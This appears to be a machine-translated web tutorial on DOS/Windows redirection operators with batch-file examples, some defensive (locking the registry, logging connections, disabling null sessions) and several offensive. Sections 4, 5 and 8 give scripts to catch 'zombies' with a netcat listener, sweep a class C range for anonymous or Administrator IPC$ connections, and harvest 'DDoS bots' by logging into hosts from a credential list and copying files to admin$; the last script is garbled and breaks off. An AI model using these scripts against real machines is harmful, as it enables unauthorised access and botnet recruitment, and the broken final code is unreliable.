Security Applications of redirection commands

Source: Internet
Author: User

As you know, DOS has a redirection facility that is not commonly used. It is a very useful little item. It can also be used in Win9x/ME/2000/XP, and flexible use of it brings great convenience, whether for intrusion, for defense or for ordinary system administration. Today, let's take a look at several security application instances of redirection commands.

I. Command Format

Standard input and output in DOS normally go through the standard devices, the keyboard and the display. With redirection you can easily switch the input or output to a disk file or another device. The operators are:

1. Greater-than ">" sends command output to a file or device; for example "> prn" sends it to the printer. When ">" is used, some command output (such as error messages) is not redirected.

2. Double greater-than ">>" adds the command output to the end of the file without deleting the information already in it.

3. Less-than "<" takes the input required by the command from a file instead of the keyboard.

4. The ">&" form redirects output from one default I/O stream (stdout, stdin, stderr) to another default I/O stream. For example, "command > output_file 2>&1" redirects all error messages of the command from the screen into the standard output file. The stream numbers are as follows:

Stream    Number
stdin     0
stdout    1
stderr    2

Both 1 and 2 create the file that stores the data; 4 may not be available in DOS.

II. Redirect command output

Almost all commands send their output to the screen. Even a command that sends output to a drive or printer displays messages and prompts on the screen. To redirect output from the screen to a file or printer, use the greater-than sign (>); it can be used with most commands. For example, the following command redirects the directory listing generated by the dir command to the file dirlist.txt: dir > dirlist.txt. If dirlist.txt does not exist, the system creates it. If dirlist.txt exists, the system replaces the contents of the file with the output of the dir command.

To add command output to the end of a file without losing the information already in it, use the double greater-than sign (>>). For example, the following command appends the directory listing generated by the dir command to dirlist.txt: dir >> dirlist.txt.

Input can be redirected to a command in the same way. Just as command output can be sent to a file or printer instead of the screen, command input can be taken from a file instead of the keyboard. To take input from a file, use the less-than sign (<). For example, the following command takes the input of the sort command from the file list.txt: sort < list.txt
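The points above (error output escaping a plain ">", the position of "2>&1", append versus overwrite, and input taken from a file) as one runnable batch file. This is an added example for this page, not code from the original article; the folder name it lists is constructed so that dir fails, and the file names are arbitrary. It needs cmd.exe (2000/XP), since COMMAND.COM on Win9x does not understand the stream numbers.

```batch
@echo off
rem Added example (not from the original article): shows which output stream
rem each redirection operator captures. The folder name below is constructed so
rem that "dir" fails and prints its error message on stderr (stream 2).
setlocal
set MISSING=C:\no_such_folder_demo_12345

echo [1] ">" alone: stdout goes to the file, the error still reaches the screen
dir %MISSING% >redir_demo.txt
type redir_demo.txt

echo [2] "2>&1" placed after the file redirection merges stderr into the same file
dir %MISSING% >redir_demo.txt 2>&1
type redir_demo.txt

echo [3] "2>" captures only the error; normal output stays on the screen
dir %MISSING% 2>redir_errors.txt
type redir_errors.txt

echo [4] ">>" appends; ">" would have overwritten the first line
echo first line>redir_demo.txt
echo second line>>redir_demo.txt
type redir_demo.txt

echo [5] "<" feeds the file to a command's standard input
sort <redir_demo.txt

del redir_demo.txt redir_errors.txt
endlocal
```

Step 1 is the pitfall from the list above: the file holds only the listing header while "File Not Found" still appears on the screen. Step 2 shows the order that matters: "2>&1" must come after the file redirection, otherwise stderr is copied to where stdout pointed before the file was attached.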

III. Application Examples


1. Lock/unlock the Registry

As you know, if the DWORD value "DisableRegistryTools" under the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System branch is set to 1, the registry is locked so that others cannot use Registry Editor. With the redirection command you can lock or unlock the registry from DOS, which is very convenient.

Open the Notepad program and create a text file. Enter the following content:

@echo REGEDIT4>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@regedit /s 123.reg
@deltree /y 123.reg

Save it as a batch file with the extension .bat. Double-click the file and the registry is locked!

In the above commands, echo is the DOS echo command; the "@" prefix before it means the line itself is not displayed in the command window while it executes (remove the "@" if you want to watch the program run). When writing the code above, note that "REGEDIT4" on the first line must be in uppercase, that there is no space between "echo" and "." on the second line, and that ">>" appends to the file named after it, while ">" on the first line creates the file afresh. regedit /s imports the file silently. The last line, deltree /y 123.reg, deletes the file 123.reg without asking for confirmation (deltree exists on Win9x/ME; on 2000/XP use del 123.reg instead, as in example 3).

To unlock the registry, edit the batch file and change "DisableRegistryTools"=dword:00000001 to "DisableRegistryTools"=dword:00000000, keep the rest unchanged, save the .bat file and double-click it to unlock the registry.
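The same technique, as an added example that is not part of the original article: one batch file that takes lock or unlock as its argument, builds the .reg file with redirection, imports it silently and then reads the value back with reg query so you can confirm the result. The file name regtools.reg is an arbitrary choice, and reg.exe is assumed to be present (it is built in on XP).

```batch
@echo off
rem Added example (not from the original article): the .reg-via-redirection
rem technique of section 1, parameterised and with a read-back check.
rem   regtools.bat lock     sets DisableRegistryTools to 1
rem   regtools.bat unlock   sets DisableRegistryTools to 0
rem Assumes cmd.exe (2000/XP) and reg.exe for the final query.
setlocal
set KEY=HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
set VAL=
if /i "%1"=="lock" set VAL=00000001
if /i "%1"=="unlock" set VAL=00000000
if "%VAL%"=="" (
    echo usage: regtools.bat lock  or  regtools.bat unlock
    goto :end
)
rem The redirection is written at the front of each line. A lone digit directly
rem before the output operator is read as a stream number, so keeping the
rem operator away from the text avoids that trap and also avoids trailing spaces.
rem The first line creates the file, the following lines append to it.
>regtools.reg  echo REGEDIT4
>>regtools.reg echo.
>>regtools.reg echo [%KEY%]
>>regtools.reg echo "DisableRegistryTools"=dword:%VAL%
regedit /s regtools.reg
del regtools.reg
rem Read the value back so the script reports what actually happened.
reg query "%KEY%" /v DisableRegistryTools
:end
endlocal
```

Writing to HKEY_CURRENT_USER needs no administrator rights, so the final query should show 0x1 after lock and 0x0 after unlock; if it shows something else, the import did not take effect and the policy is not what you think it is.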

2. Record the IP addresses of machines logging on to 3389

Save the following content as 3389IP.bat:

time /t >>log.log
netstat -n -p tcp | find ":3389" >>log.log
start explorer

Run 3389IP.bat and open log.log to see the IP addresses of the machines logged on to port 3389. Isn't that convenient?

3. Restore the real DOS mode

As you know, some malicious web pages modify the visitor's registry, and making DOS real mode unavailable is one of their tricks. There are many ways to restore DOS real mode; using a batch file and redirection commands is a special trick that I would like to share with you here.

@echo off
echo REGEDIT4>c:\scanreg.reg
echo.>>c:\scanreg.reg
echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
del c:\scanreg.reg

Save it as a batch file with the extension .bat. Double-click the file to restore DOS real mode, so that DOS applications can be used again.

4. Wait for the zombie to arrive


Does finding bots every day take a lot of time and effort? You can simply find bots by using redirection commands and a batch file! Use Notepad to create a text file and enter the following content:

@echo off
:start
nc -vv -w 5 -l -p 80 >>rouji.log
goto start

Save it as a .bat file (nc.exe, the main program of the network diagnostic tool Netcat, must be prepared first). After running this program you just wait for the zombies to come to you! If you are lucky, 10 a day will not be a problem.

5. Fast empty connection

A null connection is a session established with a server without any credentials; in other words, it is anonymous access to the server. Running net use \\IP\ipc$ "" /user:"" establishes a null connection with the target (the target must have IPC$ open). With the redirection command and the for command you can quickly try null connections against a whole class C block and save the results to a file for analysis. Use Notepad to edit the following file:

@echo off
echo format: test *.*.* >test.txt
for /L %%G in (1,1,254) do echo %1.%%G >>test.txt & net use \\%1.%%G\ipc$ "" /user:"Administrator" | find "command completed" >>test.txt

Save the batch file as .bat and run it. In this way a simple NT weak-password scan is realized! Specifically, the for command executes a given command for each item in a set; that is, a series of commands can be generated from a specified loop range. The format of the for command is FOR %variable IN (set) DO command [command-parameters], where:

%variable: specifies a single-letter replaceable parameter.

(set): specifies one or more files. Wildcard characters can be used.

command: specifies the command executed for each file.

command-parameters: specifies parameters or command-line switches for the given command.

When the FOR command is used in a batch file, write %%variable instead of %variable. Variable names are case sensitive, so %i is different from %I.

6. Disable NULL connections

The existence of null connections is dangerous, so it is better to disable them! Run the following commands to delete the shared resources:

net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete (other drive letters such as e and f can be deleted in the same way)

Create a text file in notepad and enter the following content:

@echo REGEDIT4>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@regedit /s 123.reg
@deltree /y 123.reg

Save it as a batch file with the extension .bat. Double-click the file to disable null connections.
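An added example, not from the original article, that checks the result of this section and also puts the FOR command explained in section 5 to use: it logs the current RestrictAnonymous value with reg query and lists the administrative shares that exist right now, using FOR /F over the output of net share. The log name is a constructed choice; reg.exe and net.exe are assumed to be the cmd.exe versions on 2000/XP.

```batch
@echo off
rem Added example (not from the original article): audits the null-session
rem hardening from section 6. Writes the current RestrictAnonymous value and
rem the administrative shares that exist right now to nullsess_audit.log
rem (constructed name). Assumes cmd.exe with reg.exe and net.exe; run as admin.
setlocal
set LOG=nullsess_audit.log
date /t >%LOG%
time /t >>%LOG%
echo --- RestrictAnonymous (1 = null sessions restricted) --- >>%LOG%
rem Stream 2 is merged into the log so the "unable to find" message is recorded
rem when the value has never been set, instead of being lost on the screen.
reg query HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa /v RestrictAnonymous >>%LOG% 2>&1
echo --- shares whose name contains $ --- >>%LOG%
rem FOR /F walks the output of net share line by line; tokens=1 puts the first
rem word of each line (the share name) into %%S. Inside the single quotes the
rem pipe must be escaped with a caret, or cmd would apply it to the FOR itself.
for /f "tokens=1" %%S in ('net share ^| find "$"') do echo %%S >>%LOG%
type %LOG%
endlocal
```

Deleting admin$, c$ and ipc$ with net share /delete, as this section does, only lasts until the Server service is restarted (for example at the next reboot), when Windows recreates the administrative shares. The RestrictAnonymous value is the part that persists, which is why this audit is worth re-running after a reboot: the share list will usually be back, and the registry line is what tells you whether the hardening still holds.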

7. Scan all computers connected to the local machine using the TCP protocol


If you scan your own computer's ports and find an unusual port open, you can check for a Trojan. The following batch file can also be used to record the IP addresses of all computers connected to the local machine over TCP. The content of the .bat file is as follows:

date /t >>123.log
time /t >>123.log
rem the trailing 10 makes netstat re-list the connections every 10 seconds until you press Ctrl+C
netstat -n -p tcp 10 >>123.log

In this way you record not only the other party's IP address but also the time and date, for your convenience.
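Sections 2 and 7 above, combined into one added example (not the article's own code): a batch file that takes an optional port number, stamps the log with the date and time, appends only the ESTABLISHED connections so that a listening socket of your own is not mistaken for a visitor, and writes a note when nothing matched so that an empty run is still recorded. The log name conn.log is an arbitrary choice; netstat, find, date and time are assumed to be the cmd.exe versions on 2000/XP.

```batch
@echo off
rem Added example (not from the original article): timestamped connection log
rem covering sections 2 and 7. Usage:
rem   conlog.bat 3389    records established TCP connections involving port 3389
rem   conlog.bat         records every established TCP connection
rem Assumes cmd.exe with netstat and find; the log name is constructed.
setlocal
set LOG=conn.log
set FILTER=:%1
if "%1"=="" set FILTER=TCP
rem Appending on every line keeps a history across runs instead of overwriting.
echo ==================== >>%LOG%
date /t >>%LOG%
time /t >>%LOG%
rem -n keeps addresses numeric (no reverse lookups), -p tcp limits the listing to TCP.
rem The second find keeps only live sessions; LISTENING and TIME_WAIT lines are dropped.
netstat -n -p tcp | find "%FILTER%" | find "ESTABLISHED" >>%LOG%
rem find returns errorlevel 1 when no line matched; say so instead of leaving a gap.
if errorlevel 1 echo no matching connections >>%LOG%
type %LOG%
endlocal
```

Because the filter is a plain substring, ":3389" matches the port on either side of the connection, which is exactly what section 2 relies on; if you only want sessions where the local side is 3389, read the local-address column of the logged lines rather than tightening the find pattern.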

8. automatically retrieve DDoS bots

DDoS is short for Distributed Denial of Service. It refers to combining many computers into an attack platform by means of client/server technology and launching DoS attacks against one or more targets, thereby multiplying the power of a DoS attack. Typically an attacker uses a stolen account to install the DDoS master program on one computer; at a set time the master communicates with a large number of agents that have been installed on many computers across the Internet, and when an agent receives the command it launches the attack. With client/server technology the master program can activate hundreds of agents within a few seconds.

Although we do not recommend that you carry out DDoS attacks, it is necessary to understand the technique. So how can we obtain bots for a DDoS attack? Save the following content as OK.bat:

@echo off
echo automatically retrieves DDoS bots
for /f "tokens=1,3*" %%i in (host.txt) do net use \\%%k\ipc$ /user:"%%j"
Copy % 1 \ % iadmin $ sysytem32 <
